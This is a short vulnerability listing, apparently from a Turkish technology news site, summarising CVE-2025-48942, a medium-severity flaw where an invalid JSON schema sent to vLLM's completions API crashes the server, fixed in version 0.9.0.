CVE-2025-48942 | Teknoloji dünyasından en güncel haberleri ve güvenlikle ilgili gelişmeleri takip edin.

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a i…
Medium CVSS: 6.5

CVE-2025-48942

vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8.0 up to but excluding 0.9.0, hitting the /v1/completions API with a invalid json_schema as a Guided Param kills the vllm server. This vulnerability is similar GHSA-9hcf-v7m4-6m2j/CVE-2025-48943, but for regex instead of a JSON schema. Version 0.9.0 fixes the issue.
Vendor
Vllm
Product
Vllm
CWE
CWE-248
Yayın Tarihi
2025-05-30 19:15:30
Güncelleme
2025-06-24 17:44:47
Source Identifier
security-advisories@github.com
KEV Date Added
-

Kategoriler

Referanslar